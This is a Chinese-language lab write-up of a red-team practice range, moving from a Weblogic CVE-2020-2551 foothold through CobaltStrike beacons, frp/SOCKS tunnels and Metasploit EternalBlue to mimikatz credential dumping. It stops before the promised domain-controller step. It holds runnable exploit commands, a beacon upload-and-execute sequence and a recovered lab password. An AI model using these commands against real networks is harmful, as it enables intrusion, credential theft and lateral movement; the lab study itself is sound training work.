从外网 Weblogic 打进内网，再到约束委派接管域控(复现)

CDxiaodong

​从外网 Weblogic 打进内网，再到约束委派接管域控(复现)

靶场官方：渗透攻击红队（微信公众号）

https://mp.weixin.qq.com/s?__biz=MzkxNDEwMDA4Mw==&mid=2247488950&idx=1&sn=48d93f1fac38eae99cc4e78474eb557c&chksm=c172cfaaf60546bc3f4bfee09181c0f3f07b0c8ba5e9d9a9a0ee92ffc734aff8fe94acb2967c&mpshare=1&scene=23&srcid=1108Dj1vgEkUTeAGMQSHtdZu&sharer_sharetime=1636354180149&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd

0x01 靶场配置

攻击机1：win10 192.168.0.193

攻击机2：kali 192.168.0.105

靶机： 192.168.0.154 weblogic服务器，其他在域内

测试：

xray扫一下weblogic 有CVE_2020_2551

直接一把梭，有admin账户且出网

​

​
​
query process查看当前进程
​

可以看到是无AV的，都不需要做免杀

直接Powershell 上线到 CobaltStrike：

cs-attack-payload Generator -powshell command生成命令shell

放入利用工具里执行

好奇怪 我本机都可以上线，但是发现weblogic服务器就是上不了线，开http上传beacon.exe并运行也不能上线

后来发现ping不了我的kali（cs服务器)，原来设置到第一层网络去了

得把kali的桥接模式设成物理机

​

ok 成功上线

看到改机器有两个网卡

hashdump下来

​

既然有第二个网卡，进行域内信息手机

凸(艹皿艹 )，扫半天没扫出来，才发现我pc靶机没打开（用巨龙拉冬9.0多口探测）

​

扫到了这个

巨龙拉冬扫一下龙洞

​

ms17-010

端口转发>cs派生给msf

利用cs自带开个SOCKS端口

​

然后msf连接

setg Proxies socks4:192.168.0.105:7000

​

attack

msf6 > setg ReverseAllowProxy true
​
msf6 > use exploit/windows/smb/ms17_010_eternalblue
​
msf6 > set payload windows/x64/meterpreter/bind_tcp
​
msf6 > set rhost 10.10.20.7
​
msf6 > run
​

打不进去，是因为cs自带的socks的不稳定性

直接用cs创建msf监听器试一下，然后msf打开监听即可

use exploit/multi/handler
​
set payload windows/meterpreter/reverse_http
​
set lhoat 192.168.0.105
​
set lport 1234

​

​

这里又产生了个误区，这样的派生结果还是进入了10.10.20.12的meterpreter，好家伙之前学的那些ew啥的考自己搭的环境去学都没能真正学到知识，还得是实战配合工具才能学到知识

用frp建立一个 socks5 隧道试试

kali配置文件 frps.ini，然后运行：

​

​

之后来到目标跳板机器运行 frpc：

当然是先上个shell上传frp文件

放temp文件夹是因为一般都是temp文件夹的权限比较高，当然我们现在是administrator

当然这里我用的是cs的frp插件

​

这个插件用起来看不懂咋用，应该是将frpc.ini传到指定文件夹，下面这个框写下这个目录就行
​

不过我直接将这个插件里面文件夹的exe直接传过去配合之前传的frpc.ini然后

shell frpc.exe -c frpc.ini

​
​

省的麻烦

建立好 socks5 隧道后 Metasploit 对其利用拿到 Meterpreter 会话：

msf6 > setg Proxies socks5:192.168.0.105:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run​

​
ok
​

通过调用 mimikatz 成功抓到其域用户的密码

load mimikatz

creds_all

​

​

解一下hash

Username  Domain   Password
saul      REDTEAM  admin!@#45

中转上线到 CobaltStrike 进行二层内网域渗透 有几种方法

1.meterpreter配置端口外带到cs，方法地址如下

MSF与CS互传sessions会话

2.设置中转（反向代理）

因为此 Win7 不出网，随后只能通过 CobaltStrike 设置中转：

这里换了kali：192.168.0.124

操作：

​

​
​

​

然后用这个监听器生成一个exe程序，然后用meterpreter的upload上传到10.10.20.7

然后在用meterpreter调用cmd运行它

upload /var/tmp/FrpProPlugin-mainfrp0.33可转发至cs/beacon.exe C:\\windows\\system32\

​

execute -f C:\\windows\\system32\beacon.exe

或cs创建powershell.ps

直接merterpreter执行cmd执行powershell

execute怎么样都上不了线，本地把载荷也传过去，也上不了线

方法3.将cs载荷带进内网

chcp 65001

meterpreter先stuid提权在执行命令试试

我记得没错开始之前会输入一条命令。编码格式的

​

CDxiaodong

值得学习，后面还会继续补充，加上小小rubishh16g笔记本电脑开五个虚拟机导致反复死机多次（要命的是cs和msf同时打开的时候就死机），几经崩溃，后面还会继续补充

CDxiaodong

这里有别的公众号大佬的另类思路 牛
https://mp.weixin.qq.com/s?__biz ... 8a1fcbc183d841c4#rd

CDxiaodong

刚才手贱又打开了，等内存条吧